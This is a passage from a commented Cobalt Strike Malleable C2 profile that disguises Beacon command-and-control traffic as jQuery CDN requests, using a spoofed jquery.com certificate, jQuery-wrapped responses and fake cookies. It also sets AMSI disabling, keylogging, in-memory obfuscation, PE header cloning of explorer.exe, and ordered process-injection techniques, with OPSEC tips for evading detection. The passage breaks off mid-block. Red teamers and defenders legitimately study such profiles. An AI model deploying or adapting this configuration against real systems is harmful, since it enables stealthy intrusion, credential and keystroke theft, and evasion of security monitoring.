90 | # set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)"; | |
91 | ## MS IE 11 User Agent | |
92 | set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; | |
93 | ||
94 | ################################################ | |
95 | ## SSL CERTIFICATE | |
96 | ################################################ | |
97 | ## Description: | |
98 | ## Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener | |
99 | ## Defaults: | |
100 | ## All certificate values are blank | |
101 | ## Guidelines: | |
102 | ## - Best Option - Use a certifcate signed by a trusted certificate authority | |
103 | ## - Ok Option - Create your own self signed certificate | |
104 | ## - Option - Set self-signed certificate values | |
105 | https-certificate { | |
106 | ||
107 | ## Option 1) Trusted and Signed Certificate | |
108 | ## Use keytool to create a Java Keystore file. | |
109 | ## Refer to https://www.cobaltstrike.com/help-malleable-c2#validssl | |
110 | ## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh | |
111 | ||
112 | ## Option 2) Create your own Self-Signed Certificate | |
113 | ## Use keytool to import your own self signed certificates | |
114 | ||
115 | #set keystore "/pathtokeystore"; | |
116 | #set password "password"; | |
117 | ||
118 | ## Option 3) Cobalt Strike Self-Signed Certificate | |
119 | set C "US"; | |
120 | set CN "jquery.com"; | |
121 | set O "jQuery"; | |
122 | set OU "Certificate Authority"; | |
123 | set validity "365"; | |
124 | } | |
125 | ||
126 | ################################################ | |
127 | ## TCP Beacon | |
128 | ################################################ | |
129 | ## Description: | |
130 | ## TCP Beacon listen port | |
131 | ## - https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/ | |
132 | ## - https://www.cobaltstrike.com/help-tcp-beacon | |
133 | ## TCP Frame Header | |
134 | ## - Added in CS 4.1, prepend header to TCP Beacon messages | |
135 | ## Defaults: | |
136 | ## tcp_port: 4444 | |
137 | ## tcp_frame_header: N\A | |
138 | ## Guidelines | |
139 | ## - OPSEC WARNING!!!!! The default port is 4444. This is bad. You can change dynamicaly but the port set in the profile will always be used first before switching to the dynamic port. | |
140 | ## - Use a port other that default. Choose something not is use. | |
141 | ## - Use a port greater than 1024 is generally a good idea | |
142 | set tcp_port "42585"; | |
143 | set tcp_frame_header "\x80"; | |
144 | ||
145 | ################################################ | |
146 | ## SMB beacons | |
147 | ################################################ | |
148 | ## Description: | |
149 | ## Peer-to-peer beacon using SMB for communication | |
150 | ## SMB Frame Header | |
151 | ## - Added in CS 4.1, prepend header to SMB Beacon messages | |
152 | ## Defaults: | |
153 | ## pipename: msagent_## | |
154 | ## pipename_stager: status_## | |
155 | ## smb_frame_header: N\A | |
156 | ## Guidelines: | |
157 | ## - Do not use an existing namedpipe, Beacon doesn't check for conflict! | |
158 | ## - the ## is replaced with a number unique to a teamserver | |
159 | ## --------------------- | |
160 | set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe | |
161 | set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe | |
162 | set smb_frame_header "\x80"; | |
163 | ||
164 | ################################################ | |
165 | ## DNS beacons | |
166 | ################################################ | |
167 | ## Description: | |
168 | ## Beacon that uses DNS for communication | |
169 | ## Defaults: | |
170 | ## maxdns: 255 | |
171 | ## dns_idle: 0.0.0.0 | |
172 | ## dns_max_txt: 252 | |
173 | ## dns_sleep: 0 | |
174 | ## dns_stager_prepend: N/A | |
175 | ## dns_stager_subhost: .stage.123456. | |
176 | ## dns_ttl: 1 | |
177 | ## Guidelines: | |
178 | ## - DNS beacons generate a lot of DNS request. DNS beacon are best used as low and slow back up C2 channels | |
179 | set maxdns "255"; | |
180 | set dns_max_txt "252"; | |
181 | set dns_idle "74.125.196.113"; #google.com (change this to match your campaign) | |
182 | set dns_sleep "0"; # Force a sleep prior to each individual DNS request. (in milliseconds) | |
183 | set dns_stager_prepend ".resources.123456."; | |
184 | set dns_stager_subhost ".feeds.123456."; | |
185 | ||
186 | ################################################ | |
187 | ## SSH beacons | |
188 | ################################################ | |
189 | ## Description: | |
190 | ## Peer-to-peer SSH pseudo-Beacon for lateral movement | |
191 | ## ssh_banner | |
192 | ## - Added in Cobalt Strike 4.1, changes client SSH banner | |
193 | ## Defaults: | |
194 | ## ssh_banner: Cobalt Strike 4.2 | |
195 | set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)"; | |
196 | set ssh_pipename "wkssvc##"; | |
197 | ||
198 | ||
199 | ################################################ | |
200 | ## Staging process | |
201 | ################################################ | |
202 | ## OPSEC WARNING!!!! Staging has serious OPSEC issues. It is recommed to disable staging and use stageless payloads | |
203 | ## Description: | |
204 | ## Malleable C2's http-stager block customizes the HTTP staging process | |
205 | ## Defaults: | |
206 | ## uri_x86 Random String | |
207 | ## uri_x64 Random String | |
208 | ## HTTP Server Headers - Basic HTTP Headers | |
209 | ## HTTP Client Headers - Basic HTTP Headers | |
210 | ## Guidelines: | |
211 | ## - Add customize HTTP headers to the HTTP traffic of your campaign | |
212 | ## - Only specify the `Host` header when peforming domain fronting. Be aware of HTTP proxy's rewriting your request per RFC2616 Section 14.23 | |
213 | ## - https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/ | |
214 | ## - Note: Data transform language not supported in http stageing (mask, base64, base64url, etc) | |
215 | ||
216 | set host_stage "false"; # Do not use staging. Must use stageles payloads, now the default for Cobalt Strike built-in processes | |
217 | #set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set | |
218 | ||
219 | http-stager { | |
220 | set uri_x86 "/jquery-3.3.1.slim.min.js"; | |
221 | set uri_x64 "/jquery-3.3.2.slim.min.js"; | |
222 | ||
223 | server { | |
224 | header "Server" "NetDNA-cache/2.2"; | |
225 | header "Cache-Control" "max-age=0, no-cache"; | |
226 | header "Pragma" "no-cache"; | |
227 | header "Connection" "keep-alive"; | |
228 | header "Content-Type" "application/javascript; charset=utf-8"; | |
229 | output { | |
230 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) | |
231 | # 2nd Line | |
232 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r"; | |
233 | # 1st Line | |
234 | prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"; | |
235 | append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; | |
236 | print; | |
237 | } | |
238 | } | |
239 | ||
240 | client { | |
241 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; | |
242 | header "Accept-Language" "en-US,en;q=0.5"; | |
243 | #header "Host" "code.jquery.com"; | |
244 | header "Referer" "http://code.jquery.com/"; | |
245 | header "Accept-Encoding" "gzip, deflate"; | |
246 | } | |
247 | } | |
248 | ||
249 | ################################################ | |
250 | ## Post Exploitation | |
251 | ################################################ | |
252 | ## Description: | |
253 | ## Controls post-exploitation jobs, including default x86/x64 program to open and inject shellcode into, AMSI bypass for execute-assembly, powerpick, and psinject | |
254 | ## https://www.cobaltstrike.com/help-malleable-postex | |
255 | ## Values: | |
256 | ## spawnto_x86 %windir%\\syswow64\\rundll32.exe | |
257 | ## spawnto_x64 %windir%\\sysnative\\rundll32.exe | |
258 | ## obfuscate false CS 3.14 - Scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way | |
259 | ## pipename postex_####, windows\\pipe_## CS 4.2 - Change the named pipe names used, by post-ex DLLs, to send output back to Beacon. This option accepts a comma-separated list of pipenames. Cobalt Strike will select a random pipe name from this option when it sets up a post-exploitation job. Each # in the pipename is replaced with a valid hex character as well. | |
260 | ## smartinject false CS 3.14 added to postex block - Directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. | |
261 | ## amsi_disable false CS 3.13 - Directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities. | |
262 | ## keylogger GetAsyncKeyState CS 4.2 - The GetAsyncKeyState option (default) uses the GetAsyncKeyState API to observe keystrokes. The SetWindowsHookEx option uses SetWindowsHookEx to observe keystrokes. | |
263 | ## threadhint CS 4.2 - allows multi-threaded post-ex DLLs to spawn threads with a spoofed start address. Specify the thread hint as "module!function+0x##" to specify the start address to spoof. The optional 0x## part is an offset added to the start address. | |
264 | ## Guidelines | |
265 | ## - spawnto can only be 63 chars | |
266 | ## - OPSEC WARNING!!!! The spawnto in this example will contain identifiable command line strings | |
267 | ## - sysnative for x64 and syswow64 for x86 | |
268 | ## - Example x64 : C:\\Windows\\sysnative\\w32tm.exe | |
269 | ## Example x86 : C:\\Windows\\syswow64\\w32tm.exe | |
270 | ## - The binary doesnt do anything wierd (protected binary, etc) | |
271 | ## - !! Don't use these !! | |
272 | ## - "csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe" | |
273 | ## - A binary that executes without the UAC | |
274 | ## - 64 bit for x64 | |
275 | ## - 32 bit for x86 | |
276 | ## - You can add command line parameters to blend | |
277 | ## - set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs"; | |
278 | ## - set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs"; | |
279 | ## - Note: svchost.exe may look weird as the parent process | |
280 | ## - The obfuscate option scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way. It’s very similar to the obfuscate and userwx options available for Beacon via the stage block. | |
281 | ## - The amsi_disable option directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities. | |
282 | ## - The smartinject option directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. This allows post-ex DLLs to bootstrap themselves in a new process without shellcode-like behavior that is detected and mitigated by watching memory accesses to the PEB and kernel32.dll | |
283 | ||
284 | post-ex { | |
285 | # Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes | |
286 | set spawnto_x86 "%windir%\\syswow64\\dllhost.exe"; | |
287 | # Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon. | |
288 | set spawnto_x64 "%windir%\\sysnative\\dllhost.exe"; | |
289 | # change the permissions and content of our post-ex DLLs | |
290 | set obfuscate "true"; | |
291 | # pass key function pointers from Beacon to its child jobs | |
292 | set smartinject "true"; | |
293 | # disable AMSI in powerpick, execute-assembly, and psinject | |
294 | set amsi_disable "true"; | |
295 | # Modify our post-ex pipe names | |
296 | set pipename "Winsock2\\CatalogChangeListener-###-0,"; | |
297 | set keylogger "GetAsyncKeyState"; | |
298 | #set threadhint "module!function+0x##" | |
299 | } | |
300 | ||
301 | ################################################ | |
302 | ## Memory Indicators | |
303 | ################################################ | |
304 | ## Description: | |
305 | ## The stage block in Malleable C2 profiles controls how Beacon is loaded into memory and edit the content of the Beacon Reflective DLL. | |
306 | ## Values: | |
307 | ## allocator VirtualAlloc CS 4.2 - Set how Beacon's Reflective Loader allocates memory for the agent. Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc | |
308 | ## checksum 0 The CheckSum value in Beacon's PE header | |
309 | ## cleanup false Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it. | |
310 | ## compile_time 14 July 2009 8:14:00 The build time in Beacon's PE header | |
311 | ## entry_point 92145 The EntryPoint value in Beacon's PE header | |
312 | ## image_size_x64 512000 SizeOfImage value in x64 Beacon's PE header | |
313 | ## image_size_x86 512000 SizeOfImage value in x86 Beacon's PE header | |
314 | ## magic_mz_x86 MZRE CS 4.2 - Override the first bytes (MZ header included) of Beacon's Reflective DLL. Valid x86 instructions are required. Follow instructions that change CPU state with instructions that undo the change. | |
315 | ## magic_mz_x64 MZAR CS 4.2 - Same as magic_mz_x86; affects x64 DLL. | |
316 | ## module_x64 xpsservices.dll Same as module_x86; affects x64 loader | |
317 | ## module_x86 xpsservices.dll Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc. | |
318 | ## magic_pe PE Override the PE character marker used by Beacon's Reflective Loader with another value. | |
319 | ## name beacon.x64.dll The Exported name of the Beacon DLL | |
320 | ## obfuscate false Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers. As of 4.2 CS now obfuscates .text section in rDLL package | |
321 | ## rich_header N/A Meta-information inserted by the compiler | |
322 | ## sleep_mask false CS 3.12 - Obfuscate Beacon (HTTP, SMB, TCP Beacons), in-memory, prior to sleeping (HTTP) or waiting for a new connection\data (SMB\TCP) | |
323 | ## smartinject false CS 4.1 added to stage block - Use embedded function pointer hints to bootstrap Beacon agent without walking kernel32 EAT | |
324 | ## stomppe true Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload | |
325 | ## userwx false Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory | |
326 | ## Guidelines: | |
327 | ## - Modify the indicators to minimize in memory indicators | |
328 | # - Refer to | |
329 | ## https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/ | |
330 | ## https://www.youtube.com/playlist?list=PL9HO6M_MU2nc5Q31qd2CwpZ8J4KFMhgnK | |
331 | ## https://www.youtube.com/watch?v=AV4XjxYe4GM (Obfuscate and Sleep) | |
332 | stage { | |
333 | ||
334 | # CS 4.2 added allocator and MZ header overrides | |
335 | set allocator "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc | |
336 | #set magic_mz_x86 "MZRE"; | |
337 | #set magic_mz_x64 "MZAR"; | |
338 | set magic_pe "NO"; | |
339 | set userwx "false"; | |
340 | set stomppe "true"; | |
341 | set obfuscate "true"; | |
342 | set cleanup "true"; | |
343 | # CS 3.12 Addition "Obfuscate and Sleep" | |
344 | set sleep_mask "true"; | |
345 | # CS 4.1 | |
346 | set smartinject "true"; | |
347 | ||
348 | # Make the Beacon Reflective DLL look like something else in memory | |
349 | # Values captured using peclone agaist a Windows 10 version of explorer.exe | |
350 | set checksum "0"; | |
351 | set compile_time "11 Nov 2016 04:08:32"; | |
352 | set entry_point "650688"; | |
353 | set image_size_x86 "4661248"; | |
354 | set image_size_x64 "4661248"; | |
355 | set name "srv.dll"; | |
356 | set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
357 | ||
358 | ## WARNING: Module stomping | |
359 | # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory. | |
360 | # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon. | |
361 | # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully. | |
362 | # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon. | |
363 | # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4 | |
364 | ||
365 | # set module_x64 "netshell.dll"; | |
366 | # set module_x86 "netshell.dll"; | |
367 | ||
368 | # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep. | |
369 | transform-x86 { # transform the x86 rDLL stage | |
370 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops | |
371 | strrep "ReflectiveLoader" "execute"; # Change this text | |
372 | strrep "This program cannot be run in DOS mode" ""; # Remove this text | |
373 | strrep "beacon.dll" ""; # Remove this text | |
374 | } | |
375 | transform-x64 { # transform the x64 rDLL stage | |
376 | prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops | |
377 | strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL | |
378 | strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL | |
379 | } | |
380 | ||
381 | stringw "jQuery"; # Add this string to the DLL | |
382 | } | |
383 | ||
384 | ################################################ | |
385 | ## Process Injection | |
386 | ################################################ | |
387 | ## Description: | |
388 | ## The process-inject block in Malleable C2 profiles shapes injected content and controls process injection behavior. | |
389 | ## Values: | |
390 | ## allocator VirtualAllocEx The preferred method to allocate memory in the remote process. Specify VirtualAllocEx or NtMapViewOfSection. The NtMapViewOfSection option is for same-architecture injection only. VirtualAllocEx is always used for cross-arch memory allocations. | |
391 | ## min_alloc 4096 Minimum amount of memory to request for injected content. | |
392 | ## startrwx false Use RWX as initial permissions for injected content. Alternative is RW. | |
393 | ## userwx false Use RWX as final permissions for injected content. Alternative is RX. | |
394 | ## | |
395 | ## | |
396 | ## Use the transform-x86\x64 to pad content injected by Beacon | |
397 | ## Use the execute block to control use of Beacon's process injection techniques | |
398 | ## Guidelines: | |
399 | ## - Modify the indicators to minimize in memory indicators | |
400 | # - Refer to | |
401 | ## https://www.cobaltstrike.com/help-malleable-c2#processinject | |
402 | ## https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/ | |
403 | ||
404 | process-inject { | |
405 | ||
406 | # set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection | |
407 | set allocator "NtMapViewOfSection"; | |
408 | ||
409 | # Minimium memory allocation size when injecting content | |
410 | set min_alloc "17500"; | |
411 | ||
412 | # Set memory permissions as permissions as initial=RWX, final=RX | |
413 | set startrwx "false"; | |
414 | set userwx "false"; | |
415 | ||
416 | # Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append. | |
417 | transform-x86 { | |
418 | prepend "\x90\x90"; | |
419 | #append "\x90\x90"; | |
420 | } | |
421 | ||
422 | transform-x64 { | |
423 | prepend "\x90\x90"; | |
424 | #append "\x90\x90"; | |
425 | } | |
426 | ||
427 | ## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include: | |
428 | # | |
429 | # Name x86->x64 x64-x86 Notes | |
430 | ######################################################################### | |
431 | # CreateThread Current Process only | |
432 | # CreateRemoteThread Yes No cross-session | |
433 | # NtQueueApcThread | |
434 | # NtQueAPCThread-s This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only. | |
435 | # RtlCreateUserThread Yes Yes Risky on XP-era targets; uses RWX shellcode for x86->x64 injection. | |
436 | # SetThreadContext Yes Suspended processes (e.g. post-ex jobs only) | |
437 | execute { | |
438 | ||
439 | # The order is important! Each step will be attempted (if applicable) until successful | |
440 | ## self-injection | |
441 | CreateThread "ntdll!RtlUserThreadStart+0x42"; | |
442 | CreateThread; | |
443 | ||
444 | ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s) | |
445 | # OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process. | |
446 | # SetThreadContext; | |
447 | NtQueueApcThread-s; | |
448 | ||
449 | ## Injection into existing processes | |
450 | # OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products. | |
451 | #NtQueueApcThread; | |
452 | ||
453 | # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries | |
454 | # OPSEC - fires Sysmon Event 8 | |
455 | CreateRemoteThread; | |
456 | ||
457 | # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries | |
458 | # OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread | |
459 | RtlCreateUserThread; | |
460 | } | |
461 | } | |
462 | ################################################ | |
463 | ## Maleable C2 | |
464 | ## https://www.cobaltstrike.com/help-malleable-c2#options | |
465 | ################################################ | |
466 | ## HTTP Headers | |
467 | ################################################ | |
468 | ## Description: | |
469 | ## The http-config block has influence over all HTTP responses served by Cobalt Strike’s web server. Here, you may specify additional HTTP headers and the HTTP header order. | |
470 | ## Values: | |
471 | ## set headers "Comma separated list of headers" The set headers option specifies the order these HTTP headers are delivered in an HTTP response. Any headers not in this list are added to the end. | |
472 | ## header "headername" "header alue The header keyword adds a header value to each of Cobalt Strike's HTTP responses. If the header value is already defined in a response, this value is ignored. | |
473 | ## set trust_x_forwarded_for "true" Adds this header to determine remote address of a request. | |
474 | ## Guidelines: | |
475 | ## - Use this section in addition to the "server" secion in http-get and http-post to further define the HTTP headers | |
476 | ||
477 | http-config { | |
478 | set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type"; | |
479 | header "Server" "Apache"; | |
480 | header "Keep-Alive" "timeout=10, max=100"; | |
481 | header "Connection" "Keep-Alive"; | |
482 | # Use this option if your teamserver is behind a redirector | |
483 | set trust_x_forwarded_for "true"; | |
484 | } | |
485 | ||
486 | ################################################ | |
487 | ## HTTP GET | |
488 | ################################################ | |
489 | ## Description: | |
490 | ## GET is used to poll teamserver for tasks | |
491 | ## Defaults: | |
492 | ## uri "/activity" | |
493 | ## Headers (Sample) | |
494 | ## Accept: */* | |
495 | ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM= | |
496 | ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1) | |
497 | ## Guidelines: | |
498 | ## - Add customize HTTP headers to the HTTP traffic of your campaign | |
499 | ## - Analyze sample HTTP traffic to use as a reference | |
500 | ## - Multiple URIs can be added. Beacon will randomly pick from these. | |
501 | ## - Use spaces as a URI seperator | |
502 | http-get { | |
503 | ||
504 | set uri "/jquery-3.3.1.min.js"; | |
505 | set verb "GET"; | |
506 | ||
507 | client { | |
508 | ||
509 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; | |
510 | #header "Host" "code.jquery.com"; | |
511 | header "Referer" "http://code.jquery.com/"; | |
512 | header "Accept-Encoding" "gzip, deflate"; | |
513 | ||
514 | metadata { | |
515 | base64url; | |
516 | prepend "__cfduid="; | |
517 | header "Cookie"; | |
518 | } | |
519 | } | |
520 | ||
521 | server { | |
522 | ||
523 | header "Server" "NetDNA-cache/2.2"; | |
524 | header "Cache-Control" "max-age=0, no-cache"; | |
525 | header "Pragma" "no-cache"; | |
526 | header "Connection" "keep-alive"; | |
527 | header "Content-Type" "application/javascript; charset=utf-8"; | |
528 | ||
529 | output { | |
530 | mask; | |
531 | base64url; | |
